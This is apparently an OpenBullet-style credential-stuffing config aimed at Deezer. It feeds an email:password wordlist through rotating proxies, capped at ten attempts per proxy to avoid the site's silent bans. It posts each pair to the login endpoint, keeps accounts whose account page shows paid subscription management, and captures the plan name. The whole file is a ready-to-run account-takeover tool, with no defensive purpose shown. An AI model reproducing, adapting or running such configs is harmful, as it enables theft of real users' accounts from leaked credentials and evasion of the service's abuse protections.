[SETTINGS]
{
  "Name": "Deezer",
  "SuggestedBots": 100,
  "LastModified": "2018-05-05T19:19:46.0092345+02:00",
  "AdditionalInfo": "Silent bans proxies after N attempts. I put 10 max tries per proxy by default.",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 10,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST GET "https://www.deezer.com/login?redirect_type=page&redirect_link=%2Fen%2F" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#LOGIN REQUEST POST "https://www.deezer.com/ajax/action.php" AutoRedirect=TRUE 
  CONTENT "type=login&mail=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.deezer.com/login?redirect_type=page&redirect_link=%2Fen%2F" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "error" 
  KEYCHAIN Success OR 
    KEY "success" 
#GET_ACC_INFO REQUEST GET "http://www.deezer.com/account/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: http://www.deezer.com/en/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "\"MANAGE_SUBSCRIPTION\":true" 
  KEYCHAIN Failure OR 
    KEY "\"MANAGE_SUBSCRIPTION\":false" 
    KEY "\"OFFER_NAME\":\"free\"" 
#CAPTURE_OFFER PARSE "<SOURCE>" LR "\"OFFER_NAME\":\"" "\"" Recursive=FALSE -> CAP "Offer" "" "" 
